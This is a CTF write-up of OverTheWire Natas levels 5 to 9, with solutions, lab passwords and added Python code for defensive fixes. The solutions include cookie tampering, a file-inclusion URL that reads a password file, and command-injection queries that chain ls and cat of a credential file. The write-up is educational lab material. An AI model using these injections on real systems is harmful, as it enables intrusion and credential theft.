Introduction
This is the second of my writeups for OverTheWire’s Natas series of challenges. You can view the first part here.
Level 5
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Upon opening the webpage, I see the following message:
Access disallowed. You are not logged in
There was nothing in the source code, so I decided to check the cookies associated with the page. On Firefox/Chrome, this can be done with the shortcut Ctrl+Shift+I -> Storage -> Cookies.
I see one cookie named loggedin with a value of 0. From experience, I assume that 0 means False and therefore 1 means True. I changed the value of the cookie to 1 and refreshed the page.
The text on the page now shows that I am logged in and presents the flag for the next level.
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
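The loggedin cookie is accepted exactly as the client sends it, which is why flipping 0 to 1 is enough. The following is an added example, not code from the challenge or the writeup, showing the difference between that check and a cookie whose value is bound to a server-side HMAC key (the key, function names and cookie format here are my own assumptions for the demonstration):

```python
import hmac
import hashlib

# Constructed server-side key for the demonstration; a real deployment keeps this
# out of the web root and out of version control.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def naive_is_logged_in(cookie: str) -> bool:
    """The natas5 behaviour: trust whatever value the client put in the cookie."""
    return cookie == "1"


def issue_cookie(loggedin: bool, key: bytes = SERVER_KEY) -> str:
    """Build a cookie of the form <flag>.<hmac-sha256 hex> that only the server can mint."""
    payload = "1" if loggedin else "0"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def is_logged_in(cookie: str, key: bytes = SERVER_KEY) -> bool:
    """Accept loggedin=1 only when the tag over the payload verifies."""
    payload, sep, tag = cookie.partition(".")
    if not sep:
        return False  # bare value with no tag, like the original 0/1 cookie
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return False  # payload or tag was altered by the client
    return payload == "1"


if __name__ == "__main__":
    print("naive check accepts client-chosen '1':", naive_is_logged_in("1"))
    signed = issue_cookie(False)
    # Client flips the flag but cannot recompute the tag without SERVER_KEY
    forged = "1." + signed.split(".", 1)[1]
    print("signed cookie:", is_logged_in(signed))
    print("forged cookie:", is_logged_in(forged))
    print("bare '1':", is_logged_in("1"))
```

The point is not the specific construction (a server-side session store works just as well) but that the server must be able to tell its own values from ones the client typed into the developer tools.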
Level 6
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Upon opening the webpage, I see that there is a form where I can submit a query. There is also a link to the source code for this form.
This snippet of code looks interesting.
<?
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>
It looks like the $secret variable our input is compared against comes from the file includes/secret.inc. I navigate to that web page to find the secret key.
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
Submitting the value of this variable on the form gives me the password for the next level.
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Level 7
User: Natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Upon opening the challenge, I see links to two different pages: home and about. I'll take a look at home.
Two things stick out right away. The first is an interesting HTML comment in the source code.
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
The second is the URL of the home page.
http://natas7.natas.labs.overthewire.org/index.php?page=home
The ?page= parameter shows that this is a Local File Inclusion challenge. We can specify the path of the file we want to view, so let's view /etc/natas_webpass/natas8, as that is where the password should be.
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
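The page parameter is used as a file path with no check at all, so any readable file on the server can be included. As an added example (my own code, not the challenge's PHP), the block below contrasts that behaviour with an allowlist of the two pages the site actually links to, plus a normalised-path check as a second layer. The directory layout and function names are assumptions for the demonstration:

```python
import posixpath

# Constructed layout (assumed, not the challenge's real paths): page templates live here,
# and only the two pages the site links to are meant to be included.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home", "about"}


def unsafe_page_path(page: str) -> str:
    """Mirror the natas7 behaviour: the 'page' parameter becomes a path without any check.
    posixpath.join discards the base directory as soon as the second part is absolute,
    so page=/etc/natas_webpass/natas8 resolves straight to that file."""
    return posixpath.join(PAGES_DIR, page)


def safe_page_path(page: str):
    """Allowlist: map the parameter onto a fixed set of templates and refuse anything else."""
    if page not in ALLOWED_PAGES:
        return None
    return posixpath.join(PAGES_DIR, page + ".php")


def is_inside(base: str, candidate: str) -> bool:
    """Defence in depth: after normalising '..' segments, the candidate must still sit
    under base. normpath works on the string only, so this runs without touching the disk."""
    base_n = posixpath.normpath(base)
    cand_n = posixpath.normpath(candidate)
    return cand_n == base_n or cand_n.startswith(base_n + "/")


def resolve_page(page: str):
    """Combine both checks; returns the template path, or None for a rejected request."""
    path = safe_page_path(page)
    if path is None or not is_inside(PAGES_DIR, path):
        return None
    return path


if __name__ == "__main__":
    for p in ("home", "about", "/etc/natas_webpass/natas8"):
        print(f"{p!r}: unchecked -> {unsafe_page_path(p)}, allowlisted -> {resolve_page(p)}")
```

With an allowlist the parameter never reaches the filesystem as a path; the containment check only matters if a future change starts building paths from user input again.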
Level 8
User: Natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
It looks like there is another form where we can submit a query. Let’s view the source code again:
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
OK, it looks like we have to enter a string that, when passed through the encodeSecret function, equals the encodedSecret variable in the code.
Three operations are applied to it. First, it is encoded in base64. Second, the string is reversed. Finally, the bin2hex function is used. I'm not exactly sure what this does, so I google it.
Returns an ASCII string containing the hexadecimal representation of str.
Sounds simple enough, if we pass it through a hex value -> ascii representation tool online, we should be able to undo that.
Using this tool, I was able to get the following string:
==QcCtmMml1ViV3b
Now, I’ll use this tool to reverse the string.
b3ViV1lmMmtCcQ==
Finally, I’ll base64 decode it using this tool.
We end up with oubWYf2kBq, which, when I submit it as the query, produces the password needed for level 9.
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
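All three steps are reversible, which is why a stored "encoded" secret is no better than a plaintext one. The block below is an added example (my own code, not from the challenge or the writeup) that ports encodeSecret() to Python and undoes it step by step, so each intermediate value can be checked against the strings obtained with the online tools above; only the encodedSecret constant is taken from the page.

```python
import base64
import binascii

# Value taken from the natas8 source shown above
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Python port of the PHP encodeSecret(): base64_encode, strrev, bin2hex."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_steps(encoded: str):
    """Undo the three operations in reverse order and return every intermediate value."""
    reversed_b64 = binascii.unhexlify(encoded).decode()   # hex -> ASCII: "==QcCtmMml1ViV3b"
    b64 = reversed_b64[::-1]                              # un-reverse:   "b3ViV1lmMmtCcQ=="
    plain = base64.b64decode(b64).decode()                # base64 decode: "oubWYf2kBq"
    return reversed_b64, b64, plain


def decode_secret(encoded: str) -> str:
    """Convenience wrapper returning only the recovered secret."""
    return decode_steps(encoded)[2]


if __name__ == "__main__":
    for label, value in zip(("after unhex", "after reverse", "after base64"), decode_steps(ENCODED_SECRET)):
        print(f"{label}: {value}")
    # Round trip: re-encoding the recovered secret must reproduce the stored constant
    print("round trip ok:", encode_secret(decode_secret(ENCODED_SECRET)) == ENCODED_SECRET)
```

The round-trip check at the end is the test a reviewer would ask for before calling any such scheme "encryption": if the original can be rebuilt from the stored value with no key, it is an encoding, and comparing against a password hash would be the fix.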
Level 9
User: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
We are given a form with the prompt "Find words containing:". Let's view the source code.
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
So it takes whatever we put in the form and throws it into the command grep -i $key dictionary.txt.
We can control whatever is in $key, so we can easily abuse this form. There are several different ways to solve it.
I will solve it by abusing the semicolon (;). A semicolon ends the current command, just as pressing the Enter key would, so whatever follows it is run as a new command.
Knowing that, we can assemble a simple injection to run commands.
wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound
If we use this as our query, this is what the server will run:
grep -i wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound dictionary.txt
Keeping in mind that the first and last commands will not return anything, the output of the command ls is all that we will see.
This is the output:
dictionary.txt
index-source.html
index.php
index.php.tmpl
Cool! It works. Looking back at Level 7, we know that the flag for the next challenge is always stored at /etc/natas_webpass/natas<next level>; in this case the next level is 10, so our injection should reflect that.
wordthatwillnotbefound dictionary.txt; cat /etc/natas_webpass/natas10; grep -i wordthatwillnotbefound
Output:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
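The root cause is that $key is spliced into a string that a shell then parses, so the shell, not grep, decides where one command ends. As an added example (my own code, not the challenge's PHP) the block below tokenises the writeup's query the way a POSIX shell would and shows the two standard fixes: quoting the argument (what PHP's escapeshellarg does) and, better, skipping the shell entirely by passing an argv list. The function names are assumptions; the query string is the one used above.

```python
import shlex

# The query used in the writeup above, exactly as the form would receive it
PAYLOAD = "wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound"


def vulnerable_command(needle: str) -> str:
    """Mirror passthru("grep -i $key dictionary.txt"): the needle is spliced into a shell string."""
    return f"grep -i {needle} dictionary.txt"


def quoted_command(needle: str) -> str:
    """Shell-quote the needle (PHP: escapeshellarg) so it stays one word whatever it contains;
    '--' stops a needle beginning with '-' from being read as a grep option."""
    return f"grep -i -- {shlex.quote(needle)} dictionary.txt"


def grep_argv(needle: str, path: str = "dictionary.txt") -> list:
    """Preferred fix: no shell at all. Pass this list to subprocess.run(argv) (shell=False);
    the needle is exactly one argv element, so ';' and friends have no special meaning."""
    return ["grep", "-i", "--", needle, path]


def shell_commands(cmdline: str) -> list:
    """Split a command line into the separate commands a POSIX shell would run.
    shlex with punctuation_chars=True respects quotes and emits ';' as its own token."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    print("unquoted :", shell_commands(vulnerable_command(PAYLOAD)))
    print("quoted   :", shell_commands(quoted_command(PAYLOAD)))
    print("argv     :", grep_argv(PAYLOAD))
```

Running it shows the unquoted form becoming three commands with `ls` in the middle, while the quoted form and the argv form each carry the whole query as a single grep pattern. Allowlisting the needle (for example, letters only, since it is meant to match dictionary words) is a sensible extra layer but not a substitute for keeping user input out of the shell's parser.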
Conclusion
So far, all of the challenges have been basic, but I'm quickly reaching the limits of what I've already known/experienced and seen in previous CTFs. I'm excited to see how the next few levels will play out.